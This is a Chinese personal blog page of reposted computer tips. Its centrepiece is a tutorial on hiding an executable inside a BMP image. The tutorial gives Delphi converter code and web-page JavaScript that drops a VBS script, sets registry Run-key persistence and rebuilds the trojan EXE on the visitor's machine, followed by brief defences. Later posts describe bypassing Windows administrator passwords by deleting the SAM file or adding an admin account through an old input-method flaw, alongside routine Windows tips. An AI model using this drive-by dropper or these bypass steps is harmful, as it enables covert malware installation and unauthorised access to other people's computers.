|
|
用户名:jzchddj 笔名:毫紫糖糖 地区: 山东-青岛 行业:其他 |
| 日 | 一 | 二 | 三 | 四 | 五 | 六 |
很欠揍却很感人的求婚
(作者置顶)
日记
(作者置顶)
利用图片做木马应用完全解析
(作者置顶)
【简 介】
何谓BMP网页木马?它和过去早就用臭了的MIME头漏洞的木马不同,MIME木马是把一个EXE文件用MIME编码为一个EML(OUT LOOK信件)文件,放到网页上利用IE和OE的编码漏洞实现自动下载和执行.
何谓BMP网页木马?它和过去早就用臭了的MIME头漏洞的木马不同,MIME木马是把一个EXE文件用MIME编码为一个EML(OUT LOOK信件)文件,放到网页上利用IE和OE的编码漏洞实现自动下载和执行.
然而BMP木马就不同,它把一个EXE文件伪装成一个BMP图片文件,欺骗IE自动下载,再利用网页中的JAVASCRIPT脚本查找客户端的Internet临时文件夹,找到下载后的BMP文件,把它拷贝到TEMP目录.再编写一个脚本把找到的BMP文件用DEBUG还原成EXE,并把它放到注册表启动项中,在下一次开机时执行.但是这种技术只能在9X下发挥作用,对于2K,XP来说是无能为力了.
看上去好象很复杂,下面我们一步一步来:
1) EXE变BMP的方法.
大家自己去查查BMP文件资料就会知道,BMP文件的文件头有54个字节,简单来说里面包含了BMP文件的长宽,位数,文件大小,数据区长度,我们只要在EXE文件的文件头前面添加相应的BMP文件头(当然BMP文件头里面的数据要符合EXE文件的大小啦),这样就可以欺骗IE下载该BMP文件,开始我们用JPG文件做过试验,发现如果文件头不正确的话,IE是不会下载的,转换代码如下:
program exe2bmp;
uses
Windows,
SysUtils;
var len,row,col,fs: DWORD;
buffer: array[0..255]of char;
fd: WIN32_FIND_DATA;
h,hw: THandle;
begin
if (ParamStr(1)<>'') and(ParamStr(2)<>'') then begin //如果运行后没有两个参数则退出
if FileExists(ParamStr(1)) then begin
FindFirstFile(Pchar(ParamStr(1)),fd);
fs:=fd.nFileSizeLow;
col := 4;
while true do begin
if (fs mod 12)=0 then begin
len:=fs;
end else len:=fs+12-(fs mod 12);
row := len div col div 3;
if row>col then begin
col:=col+4;
end else Break;
end;
FillChar(buffer,256,0);
{一下为BMP文件头数据}
Buffer[0]:='B';Buffer[1]:='M';
PDWORD(@buffer[18])^:=col;
PDWORD(@buffer[22])^:=row;
PDWORD(@buffer[34])^:=len;
PDWORD(@buffer[2])^:=len+54;
PDWORD(@buffer[10])^:=54;
PDWORD(@buffer[14])^:=40;
PWORD(@buffer[26])^:=1;
PWORD(@buffer[28])^:=24;
{写入文件}
hw:=CreateFile(Pchar(ParamStr(2)),GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,nil,CREATE_ALWAYS,0,0);
h:=CreateFile(Pchar(ParamStr(1)),GENERIC_READ,FILE_SHARE_READ or FILE_SHARE_WRITE,nil,OPEN_EXISTING,0,0);
WriteFile(hw,buffer,54,col,0);
repeat
ReadFile(h,buffer,256,col,0);
WriteFile(hw,buffer,col,col,0);
untilcol<>256;
WriteFile(hw,buffer,len-fs,col,0);
CloseHandle(h);
CloseHandle(hw);
end;
end;
end.
以上代码可以在DELPHI4,5,6中编译 ,就可以得到一个exe2bmp.exe文件.大家打开MSDOS方式,输入
exe2bmp myexe.exe mybmp.bmp
回车就可以把第二个参数所指定的EXE文件转换成BMP格式.
接着就是把这个BMP图片放到网页上了,如果大家打开过这张图片的话,一定发现这张BMP又花,颜色又单调.所以大家放在网页上最好用这样的格式
以下是放在网页上的脚本
document.write(' ');
function docsave()
{
a=document.applets[0];
a.setCLSID('{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}');
a.createInstance();
wsh=a.GetObject();
a.setCLSID('{0D43FE01-F093-11CF-8940-00A0C9054228}');
a.createInstance();
fso=a.GetObject();
var winsys=fso.GetSpecialFolder(1);
var vbs=winsys+'\\s.vbs';
wsh.RegWrite
('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\vbs','wscript '+'"'+vbs+'" ');
var st=fso.CreateTextFile(vbs,true);
st.WriteLine('Option Explicit');
st.WriteLine('Dim FSO,WSH,CACHE,str');
st.WriteLine('Set FSO = CreateObject("Scripting.FileSystemObject")');
st.WriteLine('Set WSH = CreateObject("WScript.Shell")');
st.WriteLine('CACHE=wsh.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellFolders\\Cache")');
st.WriteLine('wsh.RegDelete("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\vbs")');
st.WriteLine ('wsh.RegWrite "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\tmp","tmp.exe"');
st.WriteLine('SearchBMPFile fso.GetFolder(CACHE),"mybmp[1].bmp"');
st.WriteLine('WScript.Quit()');
st.WriteLine('Function SearchBMPFile(Folder,fname)');
st.WriteLine(' Dim SubFolder,File,Lt,tmp,winsys');
st.WriteLine(' str=FSO.GetParentFolderName(folder) & "\\" & folder.name & "\\" & fname');
st.WriteLine(' if FSO.FileExists(str) then');
st.WriteLine(' tmp=fso.GetSpecialFolder(2) & "\\"');
st.WriteLine(' winsys=fso.GetSpecialFolder(1) & "\\"');
st.WriteLine(' set File=FSO.GetFile(str)');
st.WriteLine(' File.Copy(tmp & "tmp.dat")');
st.WriteLine(' File.Delete');
st.WriteLine(' set Lt=FSO.CreateTextFile(tmp & "tmp.in")');
st.WriteLine(' Lt.WriteLine("rbx")');
st.WriteLine(' Lt.WriteLine("0")');
st.WriteLine(' Lt.WriteLine("rcx")');
st.WriteLine(' Lt.WriteLine("1000")');
st.WriteLine(' Lt.WriteLine("w136")');
st.WriteLine(' Lt.WriteLine("q")');
st.WriteLine(' Lt.Close');
st.WriteLine(' WSH.Run "command /c debug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out",false,6');
st.WriteLine(' On Error Resume Next ');
st.WriteLine(' FSO.GetFile(tmp & "tmp.dat").Copy(winsys & "tmp.exe")');
st.WriteLine(' FSO.GetFile(tmp & "tmp.dat").Delete');
st.WriteLine(' FSO.GetFile(tmp & "tmp.in").Delete');
st.WriteLine(' FSO.GetFile(tmp & "tmp.out").Delete');
st.WriteLine(' end if');
st.WriteLine(' If Folder.SubFolders.Count <> 0 Then');
st.WriteLine(' For Each SubFolder In Folder.SubFolders');
st.WriteLine(' SearchBMPFile SubFolder,fname');
st.WriteLine(' Next');
st.WriteLine(' End If');
st.WriteLine('End Function');
st.Close();
}
setTimeout('docsave()',1000);
把该脚本保存为"js.js",在网页中插入:
该脚本主要会在本地机器的SYSTEM目录下生成一个“S.VBS”文件,该脚本文件会在下次开机时自动运行。主要用于从临时目录中找出mybmp[1].bmp文件。
“S.VBS”文件主要内容如下:
Option Explicit
Dim FSO,WSH,CACHE,str
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WSH = CreateObject("WScript.Shell")
CACHE=wsh.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders\Cache")
wsh.RegDelete("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\vbs")
wsh.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\tmp","tmp.exe"
SearchBMPFile fso.GetFolder(CACHE),"mybmp[1].bmp"
WScript.Quit()
Function SearchBMPFile(Folder,fname)
Dim SubFolder,File,Lt,tmp,winsys
'从临时文件夹中查找目标BMP图片
str=FSO.GetParentFolderName(folder) & "\" & folder.name & "\" & fname
if FSO.FileExists(str) then
tmp=fso.GetSpecialFolder(2) & "\"
winsys=fso.GetSpecialFolder(1) & "\"
set File=FSO.GetFile(str)
File.Copy(tmp & "tmp.dat")
File.Delete
'生成一个DEBUG脚本
set Lt=FSO.CreateTextFile(tmp & "tmp.in")
Lt.WriteLine("rbx")
Lt.WriteLine("0")
Lt.WriteLine("rcx")
'下面一行的1000是十六进制,换回十进制是4096(该数是你的EXE文件的大小)
Lt.WriteLine("1000")
Lt.WriteLine("w136")
Lt.WriteLine("q")
Lt.Close
WSH.Run "command /c debug " & tmp & "tmp.dat <" & tmp &"tmp.in>" & tmp & "tmp.out",false,6
On Error Resume Next
FSO.GetFile(tmp & "tmp.dat").Copy(winsys & "tmp.exe")
FSO.GetFile(tmp & "tmp.dat").Delete
FSO.GetFile(tmp & "tmp.in").Delete
FSO.GetFile(tmp & "tmp.out").Delete
end if
If Folder.SubFolders.Count <> 0 Then
For Each SubFolder In Folder.SubFolders
SearchBMPFile SubFolder,fname
Next
End If
End Function
这个脚本会找出在临时文件夹中的bmp文件,并生成一个DEBUG的脚本,运行时会自动从BMP文件54字节处读去你指定大小的数据,并把它保存到tmp.dat中.后面的脚本再把它复制到SYSTEM的目录下.这个被还原的EXE文件会在下次重起的时候运行.这就是BMP木马的基本实现过程.
详细脚本代码请参考http://hotsky.363.net
防范方法:
最简单,删除或改名wscrpit.exe文件和DEBUG 文件;
安装有效的杀毒软件,因为这些脚本有好多杀毒软件已经可以查出来了.
在条件允许的情况下,安装WIN2K SP3,尽量避免去一些不名来历的网站.
让BT下载不再伤害硬盘的妙招
(作者置顶)
|
Syskey双重加密的方法及破解秘籍
(作者置顶)




一段开启摄像头的代码(BCB)
(作者置顶)
虽然简单,但还算实用,大家将就着用吧, #include "Unit1.h" void __fastcall TForm1::FormShow(TObject *Sender) for (int wIndex = 0; wIndex < 10; wIndex++) //连接设备: //获取视频驱动相关性能 //获取捕获窗口状态 void __fastcall TForm1::FormClose(TObject *Sender, TCloseAction &Action)
void __fastcall TForm1::Button3Click(TObject *Sender) void __fastcall TForm1::Button4Click(TObject *Sender) capCaptureGetSetup(hWndC, &CaptureParms, sizeof(CAPTUREPARMS)); CaptureParms.dwRequestMicroSecPerFrame = (DWORD) (1.0e6 / void __fastcall TForm1::Button5Click(TObject *Sender) void __fastcall TForm1::Button7Click(TObject *Sender) OVER | |
| 第[1] 页 | |
| [特别声明]: ①本站文章大多搜索转载自网络中,如果侵犯了您的权利,请告之我们。本站将立即删除。 ②本站所有转载文章言论不代表本站观,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有。 | |
实用:破解XP最新验证程序的三种方案(图)
(作者置顶)
来自国外博客站点的破解文章主要提供了三种方案,以绕过WGA正版认证程序: OVER | |
| 第[1] 页 | |
| [特别声明]: ①本站文章大多搜索转载自网络中,如果侵犯了您的权利,请告之我们。本站将立即删除。 ②本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有。 | |
开始→运行→输入的命令集锦
(作者置顶)
巧克力盒谜案
(作者置顶)
企业名称预先核准提交的材料
(作者置顶)
一、企业名称预先核准提交的材料
1、全体投资人签署的《企业名称预先核准申请书》;
2、全体投资人签署的《申请人授权委托意见》;
3、代办人或代理人身份证复印件。
适用于所有申请企业名称预先核准的企业;
《企业名称预先核准申请书》由国家工商行政管理总局制印,《申请人授权委托意见》已印制在《企业名称预先核准申请书》里,投资人按要求填写或打印即可;
代办人或代理人身份证复印件粘贴在《企业名称预先核准申请书》相应的位置;
投资人可通过国家工商行政管理总局企业登记注册网站下载或以国家工商行政管理总局制印的《企业名称预先核准申请书》为蓝本复印《企业名称预先核准申请书》;
代办人或代理人应出示身份证原件查看。
作为一个人
(作者置顶)
有了这个,你还拿非法操作没辙吗?
(作者置顶)
操作技巧与文件扩展名知识!【实用】
(作者置顶)
| 操作技巧与文件扩展名知识!【实用】 |
| 1.win2000下的user.dmp是什么文件? 内存转储文件,系统出错时内存的映像 2.IE中的"内容"审查密码忘了怎办? HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Ratings\Key方法是先把一台已知密码的机子的IE设密码,然后纪录该键值,在这台机子上改就成了! 3.如何解锁电脑(注册表)? [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableRegistryTools"=dword:00000000 [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableRegistryTools"=dword:00000000 另存为1.reg然后双击 4.loadqm.exe 是什么? Loads the MSN Explorer Query Manager的缩写,在安装完MSN后更新了注册表,此程序运行与否对使用msn没有影响 Loadqm.exe是MSN Queue Manager的一个组件,当您安装了MSN Explorer或MSN Messenger或Windows XP后就会随系统自动启动。 这个服务用于在后台进行系统所需的数据传送,如软件更新信息等,同时对这些传送进行排队和限流以不影响用户交互操作的带宽。 5.2000任务管理器中的cidaemon.exe? cidaemon.exe > Component of Ci Filer Service 组成Ci文档服务 是索引服务的一个组成。是文件索引服务进程,你可以在搜索对话框的搜索选项下禁止索引服务 6.win2000 唯一的管理员密码忘记怎么办? 1。将硬盘拆下,安装到另一台计算机上,删除%systemroot%\system32\config\SAM 2.对原来的系统进行修复,也就是重新安装并覆盖原来的2000,这样会出现让你重新输入管理员口令的对话框,这时你就可以修改口令了,而且可以保证原来的用户信息不会丢失。 3.利用专门的工具来修改: 如:http://www.sometips.com/soft/bd010114.bin ,如果没有rawrite.exe,可以下载一个Winimage来解开该文件到软盘 一、生成工具软盘: 1、将rawrite.exe xxxx.bin的两个文件保存到硬盘的c:\ntcrk目录; 2、准备一张质量好的软盘放入软驱,进入命令行,format a: /u /v:ntcrk 格式化 以保证该软盘没有坏区;进入c:\ntcrk目录,raw /d a: /f ntcrk.img 生成工具盘。 二、修改administrator的密码(不需要知道原来的密码): 1、在有问题的系统上(你不需要拆硬盘到其他机器了),用工具软盘启动; 2、Press return/enter to continue 按回车继续; 3、Do you have your NT disks on a SCSI controller? 如果你的NT硬盘接在 SCSI卡上,请键入y后回车,否则键入n后回车,如果能检测到你的SCSI卡会显示出发现的硬盘。 4、What partition contains your NT installation? 根据列出的分区列表,输入你的NT系统所在的分区名称,其实就是SAM文件所在的分区,如:/dev/hda1,分区会MOUNT到/MNT去,可以从其他的VCRT(ALT+F2)去看,cd、ls 5、Select what you want to do:1.改密码 ---- 6、输入SAM文件所在的路径 7、输入SAM文件名---取默认的就行 8、列出SAM中的所有用户名,输入要修改的用户名,取默认的administrator即可 9、输入新密码,如1234567890,不能不输密码 10、是否修改?当然是y了 11、还修改其他用户密码就输入要修改的用户名,否则就输!到下一步 12、Write hive file? 当然y了,否则Nothing have changed,xixi 13、About to write file back! Do it?当然y了,注意,如果你从其他VCRT进入了/以外的目录要先回到/目录。 14、恭喜你!!!如果你的运气跟我一样好。把软盘拿出来CTRL+ALT+DEL to reboot into NT,用你的新密码登录吧! 试试我这种方法: 用户不小心忘记了密码,造成无法登录Windows2000 时,只需用启动盘启动电脑或引导进入另一操作系统(如电脑安装有Win98与Win2000双系统),找到文件夹“X:\文档s and Settings\Administrator”(X为Windows2000所在磁盘的盘符),将此文件夹下的 “小甜饼s”文件夹删除,然后重新启动电脑,即可以空密码快速登录Windows2000。为安全起见,用户可重新设置各用户密码 方法一: 以前可以用输入法漏洞:不知道你的机器是否装了sp2。 net user rinus rinus /ADD net localgroup administrators rinus/ADD sp2已经把这打上补丁了。 方法2: 将硬盘摘下挂在另一台WIN2000的机子上,查看它,删掉SAM文件或者拿到本地破解! 方法3: 如果系统分区是fat,在DOS下删除C:\winnt\system32\config\sam*.* 文件即可获得管理员权限。登陆只要输入administrator不输密码即可。然后创建一个新的。 如果是NTFS分区的,去下载NTFSDOS,就可以用dos访问ntfs. 地址: www8.pconline.com.cn/download/swdetail.phtml?id=6872 说明如下: NTFSDOS Pro是一个可以制作启动盘的工具,它所制作的启动盘的与众不同之处在于:虽然使用的是MS-DOS,但却可以读写NTFS格式文件系统,所有DOS命令都可以使用在NTFS格式系统上。简单的说,它包括如下功能: ·对NTFS文件系统的完全读写操作。 ·MS-DOS下支持长文件名 ·简单实用的启动盘制作精灵 ·Windows NT/2000/XP完全兼容 一般情况下,普通用户要想使用控制面板里的“用户和密码”工具,必须提供管理员级密码。但由于疏忽,在XP中,如果普通用户运行控制面板里的“管理工具”,则不需提供上述密码和账号。因此,他可以取得计算机管理工具的使用权,而且可以由此获得本地用户和用户组的使用权。因此也就可以获得添加用户的权力。同时他还具备更改新建用户密码的权力。当然,属于普通用户组的用户不能创建管理员级用户,也不能改变其他组用户的密码。 其实,这并不是一个BUG,这只不过是一个XP缺省状态下的不安全配置而已。这一不安全的备至将有可能是计算机的管理出现混乱。要解决此问题,只要以管理员身份把Power Users组的NT AUTHORTY\INTERACTIVE项去除就可以了。 7.改变win98录音机的录音长度限制? 1.打开录音机,安下“录音”按钮,这时在录音窗口右侧显示本次录音的长度为60秒,左侧显示本次录音的置。 2.待录音进行到一定的位置后,按下“停止”按钮。 3.打开“效果”菜单,选择“减速”,这时你会发现录音窗口右面显示长度为100秒。不断重复操作,直到录音长度增加到合适长度。 4.按“收索到开头”按钮,然后再按“录音”开始正式录音,这时候录音的长度就不是一分钟了! 8.给zip文件加注释? 下载的ZIP文件多了,就记不清他们都是干什么用的了,一一解开,太麻烦如果用鼠标一指它,文件的名字就出来不是很方便吗!winzip8.0就可以。举例:比如给dhyu.zip文件进行注释,首先用WINZIP8.0打开它,在工具栏展开ACTIVE(操作)菜单,选Comment(注释)项,在出现的“注释”窗口输入dhyu.zip名称,字体,窗口大小都可以调整。按:"save(保存)完毕。只要用鼠标一指它文件的名称就出来了! 9.让windows98更快:? 1、不要在开机时载入太多不必要的常驻程式。 2、将硬盘由FAT16转为FAT32。 3、Auto执行bat和Configsys中什么也不要写. 4、不要使用ActiveDesktop,否则系统运行速度会因此减慢(右击屏幕→寻显示器属性”→Web标签→将其中关于“活动桌面”和“频道”的选项全部取消。) 5、选择“开始→程序→附件→系统工具→系统信息→系统信息对话框”,然后,选择“工具→系统配置实用程序→Systemini”,点选Vcache,新建Maximum=xxxx,再新建Minimum=xxxx,xxxx处请依照 内存大小换算后填入,公式为:内存数×256(2的8次方),如32M内存则填写如下: [Vcache] Maximum=8192 Minimum=8192 注意:xxxx12288 10.windows me使用小技:? 1.减肥法:在“我的电脑”点右键,选“属性”依此打开“性能”“文件系统”“疑难解答”选中“禁止系统还原”点“确定”然后用DOS键入“DEL_RESTORE”回车,按“Y”重启。 2.启动优化:“开始”-“运行”—输入msconfig,回车--启动项删除*scheduingAgent,*HiberMonitor,*StateMgr,*selfHostUtil,TaskMonitor.重启动。 11.巧去“添加/删除程序”中的残留信息? 去掉“添加/删除程序”中的残留信息(用户若手工删除了应用程序,则“控制面板”中的“添加/删除程序”将会留有残留信息,此时可启动REGEDIT,依次打开“HKEY_LOCAL-MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL”,则屏幕右边将显示出“添加/删除程序”中的有关项目,选中欲删除的项目“DEL”即可.) 12.修复internet exeplorer:? IE5出了问题,但你一时找不到问题的所在,试试IE的自我修复功能。“开始”--控制面板--添加/删除,选中“internet exeplorer,这时候,系统会问你是否修复internet exeplorer.选中它,重启动电脑即可。 13.windows系统优化? 1,不要将C盘塞的满满的,以免影响windows的速度。 2,将windows的墙纸删掉。 3,桌面上不要放太多的图标,最好不要设屏保,这样可以可以节省更多的内存。 4,启动菜单里尽量少放启动项目,不要同时打开很多的窗口。 5,C盘最好只安装windows,其他的软件放在别的分区里。 6,机器用一段时间后在C盘里会产生垃圾碎片,我们可以将它优化。在我的电脑点右键,选“属性”点“性能”点“虚拟内存”自爱对话框里选“用户指定虚拟内存”,在硬盘的栏选硬盘(别选C盘),在最大值和最小值里添一个数字,别小于128MB。 7,DMA33模式,右键点我的电脑,属性--设备管理器--硬盘---双击----在DMA前面打对号,不理会windows提示,重启动。 14.Windows 98安装盘里的资源包? 在制作FLASH时候常会为找一些有意思的声音文件而在光盘市场里转溜吧!其实在Windows 98安装盘上就有现成的,Win98 75.CAB到Win98 80.CAB有近三百个声音文件,才10M,;而在Windows 98安装盘的WIN98 73.CAB ,WIN98 73.CAB 这个压缩包中还有桌面主题中的各种图片,这对苦于没有现成图片的制作工具的人员来讲,就不必费必寻找了。 15.让“瘟酒吧”更稳定的小技巧? “瘟酒吧”系统BUG多多,以致于经常发生蓝屏、VMM错误、启动时出现错误信息等问题。你可以按照以下步骤来稳定系统:首先将98安装光盘放入光驱,点击“开始”-“程序”-“附件”-“系统工具”-“系统信息”,以系统信息的工个栏里选择“系统文件检查器”,再选择“从安装软盘提取一个文件”,将以下文件提到:X:\WINDOWS\SYSTEM\ VMM32中(X为你的系统所在分区):configmg.vxd ,ntkern.vxd,vcomm.vxd,vdd.vxd,vdmad.vxd,vflatd.vxd和vmouse.vxd文件。 16.Windows 98安装程序SETUP中的隐藏参数? 格式: setup [batch] [/ie] [/im] [/is] [/iv] [/iw] [/id] [/nr]/ie 跳过制作启动盘/im 跳过常规内存检查/is 不运行scandisk(使用新的或刚刚格式化硬盘时可用处/iv 不显示公告版(即有关Windows 98新特性介绍)/iw 跳过版权认证/nr 跳过注册表检查Format的隐含参数/autotext 自动测试磁盘(即模拟格式化完毕后显示信息)/backup 同上,但有提示输入卷标/z:n 格式化后每一簇大小,n=1=512bytes,2=2×512bytes依此类推格式化时小心使用/u 执行无条件格式化,每一字均用十六帛F6覆盖无法恢复 17.保护Windows个人密码文件一招? 熟悉WIN95/98系统的用户都知道,有关用户密码信息都存贮在Windows目录下扩展名为.pwl的文件。这里告诉你一个简单而有效的保护方法:单击“开始”,“运行”输入sysedit打开“系统配置实用程序”选中关于文件system.ini这里你会发现在其列表中有一项标题为[Password Lists]的项,这就是有关用户密码文件的链接记录,其中CYS=C:\WINDOWS\CYS.PWL(等号前的“CYS”为用户名,等号后为该用户密码文件的存放路径及文件名)知道了这点,我们就可以进行修改,以便任意指定文件。比如,你可以事先将源文件CYS。PWL改名并复制到另一目录中,如在DOS方式中执行命令:COPY C:\WINDOWS\CYS.PWL C:\WINDOWS\SYSTEM\C1.DAT.然后再将System.ini中密码文件的存放路径改为CYS=C:\WINDOWS\SYSTEM\C1.DAT。这样,就没有人再能轻松地找到你的密码文了。 18.Windows 2000快捷运行命令? 单击“开始”菜单,打开“运行”命令框(或者用"Win+R"组合键打开),在打开的对话框中输入以下命令即可执行相应的功能drwtsn32----Dr.Watson for Windows 2000.eventvwr---事件查看器.ipsecmon--IP安全监视器.mmc---控制台.ntbackup---打开Windows2000备份及故障恢复工具.themes---打开桌面主题.wnchat---聊天功能. 19.Windows Me安装技巧? 如果你的Windows Me因故损坏,按以下方法重新安装能大提高速度:用启动盘将系统引导至纯DOS环境,如果你的系统安装在\WINDOWS目录,可以使用进入\windows\options\install,运行其中的Setup命令开始重新安装。Windows Me之所以将安装文件放入系统目录,一方面便于添加系统组件,另一方面有利于系统故障修复。如果你的硬盘空间非常紧张,可以在安装Windows Me后将"Options"文件夹删除。然后打开注册表HKEY LOCAL MACHINE\SOFT-WARE\Microsoft\Windows\CurrentVersion\Setup分支,将"SourcePath"的值改为"E:\Windows Me\"(E是你的光驱)。以后一旦Windows Me需要某些安装文件,就会自动到光盘上找。 20.何清除IE标题栏的恶意修改? 现在许多的个人网站站长为了片面追求访问量,使用了许多令人讨厌的方法,如强制加入收藏夹,强制设为首页。现在新的方法是修改你的注册表,将你的浏览器的标题栏加入他的网站的广告。如**网站 地址:****,很是烦人。我也受过其害,以为是中了病毒!现将解决的方法告诉大家!打开start->run->regedit,开始/运行/输入regedit 打开注册表按顺序进入HK_CURRENT_USER\software\microsoft\internet explorer\main, 然后 清除这个键值"window title" 你会看到你讨厌的广告文字在其后面,清除后关闭注册器!然后你重新打开IE,它运行默认的标题。一切ok! 21.破解“非法操作”现象密技? 大家都遇到过这样的问题,有时候在操作windows98系统的时候,就会出现一个对话框:“该程序执行了非法操作,如果仍有问题,请与程序供应商联系”。你也曾打开过‘详细资料“但只能看到“xxxxxx在xxxx的模块导致xx错误“的信息。你可能知道应用程序内部出现了问题,但只能关闭。 windows中这种问题叫做GENERAL PROTECTION FAULT,简称GPF。打开windows的系统信息,点击“工具”下的Dr.Watson,它是一个专门诊断GPF的小程序。启动Dr.Watson,它开始收集系统信息生成快照。就会查出错误所在,关闭错误,就行了! 22.如何解除系统启动时调用的程序? 很多软件需要在计算机启动的时候运行一个程序,如“超级解霸”等。这个程序并不是加在“启动”中的,而是加入在系统的注册表里了。所以在“启动”中是看不到的。要想解除一些程序在开机后自动运行可以试着去修改一下注册表。具体方法是:选择“开始/运行”输入regedit,找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run目录,这个目录中所有的内容就是在计算机启动时要被执行的程序,不想要哪个删除就可以了。 23.找找死机的原因ASD? ASD是windows自带的一个小工具能够帮助你在启动的时候自动跳过一部分能够导致系统崩溃的驱动程序。在“开始”-运行后输入ASD,启动该程序。如果程序告诉你“这台机器没有出现严重的ASD操作失败”那么你的机器管理的不错。如果有问题的话ASD就会弹出一个窗口,列出所有失败的错误和操作。此时在程序前面的复选匡中打勾,确定。即可! 24.查看秘密网页? 当你在一个喜爱的站点漫游时,有没有想到过,Web站的有些内容,不是对外公开的,一般的读者无法看到这些页面。你是否想看看有哪些秘密网页呢,有一个办法,就是利用robots.txt文件。这个文件中列出了未公开页面的名称,用来告诉搜索引擎这些页面不在搜索范围之列。在浏览器地址栏中的网址后加上“/robots.txt”,你就可看到那些秘密网页的文件或文件夹列表。此后,在地址栏直接键入这些网页名,就可一睹秘密页面.---选自《红客联盟》--军人。 25.让Realplayer从“启动”中消失? 点系统托盘区Realplayer图标,弹出的菜单中选“首选项”,在“常规”下的"StarCenter设置”中将“启用StarCenter”前的对号去掉。然后在弹出的对话框点“确定”即可。 26.迅速查看网站更新时间? 有些站点会给你看最新更新的时间,对于没有给出更新时间的站点怎样知道更新时间呢?方法:打开该网站,在浏览器地址栏输入:javalert(文档.lastModified),再按回车。 27.巧给电源风扇加油? 有些不用给风扇拆下也能加油,找一只注射器吸少许缝纫机油,在机箱背面找到电源风扇中心位置的小孔,插入针头直接注射。 28.给注册表解锁? 如果你给注册表加密后导致自己都无法修改,可采用以下方法解锁:1.如果你对修改前的注册表文件(system.dat和user.dat)有备份,可以将它们拷到Windows目录下,覆盖对应文件即可。2.如果你没有备份,可以在DOS方式下转到Windows目录,运行scanreg/restore,选定以前某天系统对注册表的备份,直接恢复即可。 29.Alt键的妙用? 激活菜单命令:按下Alt键可以激活活动窗口的菜单栏,使菜单栏的第一个菜单为高亮条,而按下Alt键和一个相应的字每就可以激活这个字母所代表的菜单项。快速查看属性:按下Alt+Enter组合z键或按住Alt键的同时用鼠标左键双击某对象,则可快速打开其属性的对话框。切换应用程序:连续按下Alt+ESC键可以直接切换到已经运行但没有最小化的各个应用程序,而按住Alt键不放再连续按下Tab键则可以在一个对话框中显示出已经运行的所有程序的图标和当前激活的程序的图标及其名称,只要释Alt键便可以立刻切换到该应用程序中。撤消上步操作:在Win98的各对话框中,凡是对编辑的操作都可以通过Alt+Backspace键来撤消.拷贝活动窗口按下Print Screen可以拷贝当前屏幕的内容,但是按Alt+PrintScreen键则可以拷贝当前活动窗口的内容。 30.轻松化解下载文件错误? 历经M次断线,花费N小时,用网络蚂蚁下回XX兆的文件却无法打开,真想哭都找不着调啊,不要不要悲伤,不妨看看以下两点。1.对于ZIP文件,请不要从网络蚂蚁删除下载任务,也不要移动下载的文件,打开网络蚂蚁,在下载的任务上右面击鼠标,从弹出的菜单中选“修复损坏的ZIP文件”,网络蚂蚁将对文件进行CRC校验,并标出损坏区域,然后重新下载损坏的区域。2.对于可自解压的EXE文件,不要理系统的提示,只要把后缀改为ZIP,调用WinZip打开试试。 31.如何知道下载的文件类型? 系统可以自动隐藏文件类型的扩展名,可以在资源管理器里点击“工具”菜单,选择“文件夹选项”后再选择“查看”标签,然后把“隐藏已知文件扩展名”前的钩去掉。对于这一类的文件,实际上系统已经建立好了联系,你直接点击该文件一般都能自动运行。另外,我们一般都可以根据下载文件的内容大体上推测文件的类型:比如.EXE、ZIP、SCR等等。当然,如果你的计算机中没有打开所下载文件的应用程序,你最好在下载前稍微留心点。 32.在DOS环幸境下创建启动盘? 我们都通过“控制面板”中的“添加/删除程序”来制作Windows 98启动盘,但在根本进入不了系统的时候又该怎么办呢?如果系统已经瘫痪无法进入Windows 98的情况下,可在开机自检启动时,按下F8键,进入MS-DOS模式,插入一张软盘进行以下操作就可以创建启动盘了: c:\>format/s/q a: c:\>copy windows\command\edb\*.* a: 复制中提示替换系文件一定要选“NO”,否则制作不成启动盘。这张启动盘含有各种磁盘工具并支持光驱,功能和前述几种方法制成的启动盘完全相同。 33.解除屏幕保护密码(适用Windows 9X/ME/2000)? 如果你忘记了屏保密码怎么办?许多老牌的电脑高手都知道以前在Win 3.xx、Win 95、Win 95a OSR1中可同时按住Ctrl+Alt+删除,接着再按Ctrl+Esc,这样就可从有密码的屏保中恢复到系统正常状态。不过此招在Win 95 OSR 2.x、Win 98、WinNT 4.0、Win2000中已经失灵,没关系,我们找到了新的方法,它可以完全地将屏保密码删除掉。打开注册表编辑器,找到:HKEY_USERS/.Default/Control Panel/desktop,在右边的窗口找到"ScreenSave_Data"字符串值, 选中并删除它。这样屏保密码就轻松地解除啦! 34.强制退出(适用Windows 9X/ME)? 如果你使用的是Win 9X/ME,那么一定会经常遇到在关机、重启时系统弹出错误信息说:某个程序还在运行,请先关闭所有程序,然后退出Windows,其实这说明某个程序此时正处于锁死状态,致使你无法退出Windows,我们一般情况下会使用“三键解决法”,也就是同时按下Alt + Ctrl + Del,然后点击结束任务来强行关闭锁死的程序,不过我们这里要告诉大家一个更好的解决办法。 打开注册表编辑器,找到:HKEY_CURRENT_USER/Control Panel/desktop,在右边的窗口中找到"AutoEndTasks"字符串,如果你的注册表中没有它,那么可以点右键-->新建-->字符串值,为它起名为: "AutoEndTasks",双击该字符串,将其值设置为:1,这样即可打开系统的强制结束任务功能。如果你将值设置为:0,那么就是关闭该功能。 35.活用你的IE地址栏? 